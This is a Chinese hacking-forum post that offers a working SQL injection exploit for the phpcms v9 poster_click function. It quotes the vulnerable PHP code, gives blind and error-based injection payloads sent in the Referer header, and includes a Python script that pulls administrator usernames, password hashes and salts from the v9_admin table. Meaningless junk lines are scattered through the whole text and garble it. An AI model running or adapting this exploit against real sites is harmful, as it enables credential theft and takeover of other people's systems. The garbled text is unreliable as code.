中国网络渗透测试联盟
标题:
phpcms post_click注入0day利用代码
[打印本页]
作者:
admin
时间:
2013-1-11 21:01
标题:
phpcms post_click注入0day利用代码
有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:
7 c7 E/ e) t- Y5 }
% p% u# A1 r' A; I
问题函数\phpcms\modules\poster\index.php
# W6 r0 I; j8 p4 ^. a; r. E
& s9 P5 k" a8 \: t% d
public function poster_click() {
" p" J, _ z" |' d( Y8 W# f0 _$ U
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
$ A- Z8 [* U% j7 x8 d
$r = $this->db->get_one(array('id'=>$id));
I. D4 }' W/ W+ {, z
if (!is_array($r) && empty($r)) return false;
/ b1 W( u3 p W. a5 i) K$ k
$ip_area = pc_base::load_sys_class('ip_area');
4 A3 \5 k g2 u7 r+ O
$ip = ip();
( H9 Q! a: S# H N9 v7 h) h4 }
$area = $ip_area->get($ip);
* d+ D1 V/ [' f
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
0 }. G/ c$ Q1 r3 C$ V6 l
if($id) {
) G% H! N$ h! _% D8 z
$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();
' o$ H. ]0 o$ y4 K( S; }' A5 [
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
4 C0 d5 {0 i' s3 }% O/ m, Y* O4 F& Q
}
: e6 g0 Y n2 S6 S$ N2 s3 H
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));
3 i& Z' T. j A% N1 I% W* n
$setting = string2array($r['setting']);
9 T# a' b% E2 O
if (count($setting)==1) {
7 h% ?6 u- V/ _ R$ j9 f2 o
$url = $setting['1']['linkurl'];
: f& z) a6 |2 k5 T# s _; W/ q# M
} else {
! O$ G, r2 Q: Y
$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
2 H$ _# Q' Y9 |0 c
}
: F0 G7 Q& W& \) h( A4 T
header('Location: '.$url);
& J6 H1 q) M( R) Q
}
; d: H5 R5 {. j, o" j) E
5 Z' [4 _; Z# s4 d) f
8 Q$ c" n+ P% w- |
?- ~# R4 W. X. H1 H
利用方式:
- g8 R$ |$ V2 H, ^
# S$ X1 J5 e7 S6 P$ v; J0 u
1、可以采用盲注入的手法:
5 G4 x5 |7 ^. z3 H5 n; z ]" f* |! D
_. p) o7 l2 t! W! X3 x! L
referer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
) Y. g6 _, d* x. W* }
9 I, l" h) I6 |; t9 A
通过返回页面,正常与否一个个猜解密码字段。
; i6 L6 z: a6 I+ [ q
* S$ u5 H: u, u( d! _+ a4 Q
2、代码是花开写的,随手附上了:
4 v" f0 V2 y p$ ^4 i' M/ {" n8 b
( r4 o, S0 I8 C% ^- }% f: ~
1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
1 `, x7 u: X2 ~, o* K
g, b$ ~! L+ B+ k
此方法是爆错注入手法,原理自查。
! h+ r7 S" ~8 _. [, {2 ]2 Y0 F5 G
; q( {, p3 D, |8 I9 n
: f, Y- c/ r7 V1 C
. k( ^3 }$ C# Q+ g6 t
利用程序:
. A# o$ C8 C5 z5 f9 _. q; [
8 d2 K, m: L9 ^' m
#!/usr/bin/env python
/ f2 z; K) M( ? ~9 D8 X1 d
import httplib,sys,re
; V. U. L! F; N# u0 {. {: G& p
3 N) v* k) K; _8 l- H, B: u0 k: Q
def attack():
! e" w4 ^. p" y9 H4 @8 b
print “Code by Pax.Mac Team conqu3r!”
5 O6 y; m% T7 U# H
print “Welcome to our zone!!!”
2 ]" @9 r8 u7 t' T( V D
url=sys.argv[1]
( p7 x' B& ], n/ r
paths=sys.argv[2]
' n6 R7 F% y3 m) `: {
conn = httplib.HTTPConnection(url)
( r' R, F, J' b
i_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,
) m" r! `$ d4 A! p0 }, E! L
“Accept”: “text/plain”,
+ [8 c( o* S3 k, c: C8 x% m
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
! T7 A( C: \* T# N, z6 f5 a6 R) _
conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers)
) W. A" V( k9 \5 E
r1 = conn.getresponse()
7 l2 H- F- ?3 h& D
datas=r1.read()
5 h$ v8 E4 [% M
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
9 x: h! A1 c8 B3 r
print datas[0]
" g; l% B+ j5 }0 n
conn.close()
8 k' r. Y2 V) z: s$ A
if __name__==”__main__”:
- z: o2 Z" j8 t& c2 V
if len(sys.argv)<3:
( p9 S" i3 u( M; e( p
print “Code by Pax.Mac Team conqu3r”
0 I+ q5 D+ v6 A# G* H2 s
print “Usgae:”
2 m$ T+ m5 w3 ]+ u, Z
print “ phpcmsattack.py
www.paxmac.org
/”
2 V" g# D: T+ t) r- t
print “ phpcmsataack.py
www.paxmac.org
/phpcmsv9/”
% K. y1 ^2 h% S! D1 u
sys.exit(1)
( E+ l* p: Z+ F- Y# P. E6 |
attack()
$ M/ u+ y4 ?' D6 C8 P$ F* z3 M' B. e
) ^! N: V2 D/ y0 ]1 z4 k) Y# u. o
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2